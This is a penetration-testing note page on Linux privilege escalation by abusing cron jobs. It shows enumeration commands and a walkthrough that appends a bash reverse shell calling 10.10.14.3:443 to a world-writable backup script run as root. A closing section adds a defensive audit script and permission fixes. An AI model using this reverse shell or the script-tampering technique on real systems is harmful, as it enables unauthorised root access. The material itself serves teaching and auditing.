# Cron Job Abuse

Each entry in the crontab file requires six items in the following order: minute, hour, day of month, month, day of week, command. For example, the entry `0 */12 * * * /home/admin/backup.sh` would run every 12 hours.

## Enumeration

```
cat /etc/crontab
crontab -l # user cronjobs
sudo crontab -l # root cronjobs
```

## Writable files or directories

1. `/etc/crontab`
2. `/etc/cron.d`
3. `/var/spool/cron/crontabs/root`

If we can write to a directory called by a cron job, we can write a bash script with a reverse shell command, which should send us a reverse shell when executed.

### Writable files

```shell-session
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

/etc/cron.daily/backup
/dmz-backups/backup.sh
/proc
/sys/fs/cgroup/memory/init.scope/cgroup.event_control

<SNIP>
/home/backupsvc/backup.sh

<SNIP>
```

The listing below shows a new backup archive created every three minutes, and the `backup.sh` shell script is world-writable and runs as root.

```shell-session
ls -la /dmz-backups/

total 36
drwxrwxrwx  2 root root 4096 Aug 31 02:39 .
drwxr-xr-x 24 root root 4096 Aug 31 02:24 ..
-rwxrwxrwx  1 root root  230 Aug 31 02:39 backup.sh
-rw-r--r--  1 root root 3336 Aug 31 02:24 www-backup-2020831-02:24:01.tgz
-rw-r--r--  1 root root 3336 Aug 31 02:27 www-backup-2020831-02:27:01.tgz
-rw-r--r--  1 root root 3336 Aug 31 02:30 www-backup-2020831-02:30:01.tgz
-rw-r--r--  1 root root 3336 Aug 31 02:33 www-backup-2020831-02:33:01.tgz
-rw-r--r--  1 root root 3336 Aug 31 02:36 www-backup-2020831-02:36:01.tgz
-rw-r--r--  1 root root 3336 Aug 31 02:39 www-backup-2020831-02:39:01.tgz
```

Confirm that a cron job is running using [pspy](https://github.com/DominicBreuker/pspy).

```shell-session
./pspy64 -pf -i 1000
```

{% hint style="info" %}
If editing a script, make sure to `ALWAYS` take a copy of the script and/or create a backup of it. We should also append our commands to the end of the script so that the original job still runs properly before our reverse shell command executes.
{% endhint %}

```shell-session
cat /dmz-backups/backup.sh 

#!/bin/bash
 SRCDIR="/var/www/html"
 DESTDIR="/dmz-backups/"
 FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
 tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
```

Modify the script to add a [Bash one-liner reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet):

```bash
#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
```
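
The precondition used above, a root-run cron script or its directory being writable by other users, can be audited on your own hosts. This is an added example, not part of the original page: the function names (`check_path`, `audit_crontab`, `demo`), the output format and the fixture paths are assumptions, and it goes beyond the page's single case by handling the user field of `/etc/crontab` and sticky-bit directories.

```bash
#!/bin/bash
# Added example: flag cron-invoked paths that any local user could modify.
# check_path PATH USER: report a world-writable file, or a world-writable
# parent directory without the sticky bit (anyone could replace the file).
check_path() {
  dir=$(dirname "$1")
  if [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]; then
    echo "FILE $1 (runs as $2)"
  fi
  if [ -n "$(find "$dir" -prune -perm -0002 ! -perm -1000 2>/dev/null)" ]; then
    echo "DIR $dir (holds $1, runs as $2)"
  fi
}

# audit_crontab FILE system|user
# system = /etc/crontab, /etc/cron.d/* (user field); user = `crontab -l` output
audit_crontab() {
  fmt=$2
  while IFS= read -r line; do
    set -f; set -- $line; set +f   # split on whitespace without globbing '*'
    [ $# -gt 0 ] || continue       # blank line
    case "$1" in '#'*|[A-Za-z_]*=*) continue ;; esac   # comment or VAR=value
    case "$1" in
      @*) shift ;;                 # @daily, @reboot, ...
      *)  [ $# -gt 5 ] || continue; shift 5 ;;         # five schedule fields
    esac
    user="crontab owner"
    if [ "$fmt" = system ]; then [ $# -ge 2 ] || continue; user=$1; shift; fi
    for word in "$@"; do           # only bare absolute paths are checked
      case "$word" in /*) check_path "$word" "$user" ;; esac
    done
  done < "$1"
}

# demo: constructed fixture modelled on the page's /dmz-backups/backup.sh case.
demo() {
  t=$(mktemp -d)
  mkdir "$t/dmz-backups" "$t/opt" "$t/tmp"
  touch "$t/dmz-backups/backup.sh" "$t/opt/rotate.sh" "$t/tmp/job.sh"
  chmod 777 "$t/dmz-backups" "$t/dmz-backups/backup.sh"
  chmod 755 "$t/opt" "$t/opt/rotate.sh" "$t/tmp/job.sh"; chmod 1777 "$t/tmp"
  printf '%s\n' '# constructed sample' 'SHELL=/bin/sh' \
    "*/3 * * * * root $t/dmz-backups/backup.sh" \
    "0 */12 * * * admin $t/opt/rotate.sh" \
    "@daily root $t/tmp/job.sh" > "$t/crontab"
  audit_crontab "$t/crontab" system | sed "s|$t||g"
  rm -rf "$t"
}
if [ $# -eq 2 ]; then audit_crontab "$1" "$2"; else demo; fi
```

Any finding is fixed by making the script and its directory owned by root and removing write access for others (`chown root:root`, `chmod o-w`).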

